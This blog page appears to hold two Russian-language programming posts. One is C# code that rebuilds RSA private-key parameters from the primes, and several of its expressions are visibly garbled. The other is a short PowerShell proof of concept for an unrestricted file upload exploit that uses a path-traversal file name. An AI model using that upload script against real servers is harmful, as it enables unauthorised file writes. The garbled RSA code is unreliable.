понедельник, 13 апреля 2020 г.

RSA алгоритм

Восстанавливаем ключи по двум простым числам.

  1. /*
  2.          
  3.             function inverse(a, n)
  4.     t := 0;     newt := 1
  5.     r := n;     newr := a
  7.     while newr ≠ 0 do
  8.         quotient := r div newr
  9.         (t, newt) := (newt, t − quotient × newt)
  10.         (r, newr) := (newr, r − quotient × newr)
  12.     if r > 1 then
  13.         return "a is not invertible"
  14.     if t < 0 then
  15.         t := t + n
  17.     return t
  19.          */
  21.         static BigInteger modInverse(BigInteger a, BigInteger m)
  22.         {
  23.             BigInteger m0 = m;
  24.             BigInteger y = 0, x = 1;
  26.             if (== 1)
  27.                 return 0;
  29.             while (> 1)
  30.             {
  31.                 // q is quotient
  32.                 BigInteger q = a / m;
  34.                 BigInteger t = m;
  36.                 // m is remainder now, process
  37.                 // same as Euclid's algo
  38.                 m = a % m;
  39.                 a = t;
  40.                 t = y;
  42.                 // Update x and y
  43.                 y = x - q * y;
  44.                 x = t;
  45.             }
  47.             // Make x positive
  48.             if (< 0)
  49.                 x += m0;
  51.             return x;
  52.         }
  54.         static void Main(string[] args)
  55.         {
  56.             for (int i = 0; i < 10000; i++)
  57.             {
  58.                 var rsaKey = RSA.Create(2048);
  59.                 var rsaInboundParam = rsaKey.ExportParameters(true);
  61.                 BigInteger P = new BigInteger(rsaInboundParam.Ptruetrue); ; // p - prime1
  62.                 BigInteger Q = new BigInteger(rsaInboundParam.Qtruetrue); //q - prime2
  63.                 BigInteger E = new BigInteger(rsaInboundParam.Exponenttruetrue); // e - public exponent
  65.                 BigInteger N = P * Q;// n = p * q  <<< modulus, e.g. public key
  66.                 BigInteger PHI_N = (- 1) * (- 1); // phi(n) = (p-1)*(q-1)
  67.                 BigInteger D = modInverse(E, PHI_N); // d - private exponent, d = 1/e mod phi(n)
  68.                 BigInteger DP = D % (- 1); // crt exponent 1 = d mod (p-1)
  69.                 BigInteger DQ = D % (- 1); // crt exponent 2 = d mod (q-1)
  70.                 BigInteger qInv = modInverse(Q, P); // crt coefficient  1/q mod p
  72.                 var rsaManual = new RSAParameters() //todo: в результате операций (н-р, умножение), могут получаться массивы меньшей длины (н-р, D[255], вместо D[256]). Необходимо реализовать соответствующий ресайз перед reverse
  73.                 {
  74.                     P = rsaInboundParam.P,
  75.                     Q = rsaInboundParam.Q,
  76.                     Exponent = rsaInboundParam.Exponent,
  77.                     Modulus = N.ToByteArray(truetrue),
  78.                     D = D.ToByteArray(truetrue),
  79.                     DP = DP.ToByteArray(truetrue),
  80.                     DQ = DQ.ToByteArray(truetrue),
  81.                     InverseQ = qInv.ToByteArray(truetrue)
  82.                 };
  84.                 RSA.Create(rsaManual);
  86.                 Console.WriteLine("D - {0}", rsaInboundParam.D.SequenceEqual(rsaManual.D));
  87.             }
  88.         }
Автор: на 1 комментарий:

вторник, 10 марта 2020 г.

file upload exploit

https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

  1. $url = "url/uploads";
  2. $targetFileName = "../../../virus.txt";
  3. $sourceFilePath = "C:\temp\ipaddrs.txt"
  5. $access_token = "Bearer XXXXXXXX"
  7. $file_bytes = [System.IO.File]::ReadAllBytes($sourceFilePath)
  8. [System.Net.Http.HttpClient]$httpClient = New-Object System.Net.Http.HttpClient;
  9. [System.Net.Http.MultipartFormDataContent]$form = New-Object System.Net.Http.MultipartFormDataContent;
  11. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept", "application/json, text/plain, */*") | out-null
  12. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Authorization", $access_token)  | out-null
  13. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36")  | out-null
  14. $httpClient.DefaultRequestHeaders.TryAddWithoutValidation("Accept-Language", "ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7") | out-null
  16. [System.Net.Http.ByteArrayContent]$byteContent = new-object System.Net.Http.ByteArrayContent([byte[]]($file_bytes), 0, $file_bytes.Length)
  18. $form.Add($byteContent, "file[]",$targetFileName)
  19. $response = [System.Net.Http.HttpResponseMessage]$response = $httpClient.PostAsync($url, $form).Result
  20. $sd = $response.Content.ReadAsStringAsync().Result
  21. $sd | fl *
  22. $httpClient.Dispose()

https://pastebin.com/apXwAwYc
Автор: на Комментариев нет:
Подписаться на: Сообщения (Atom)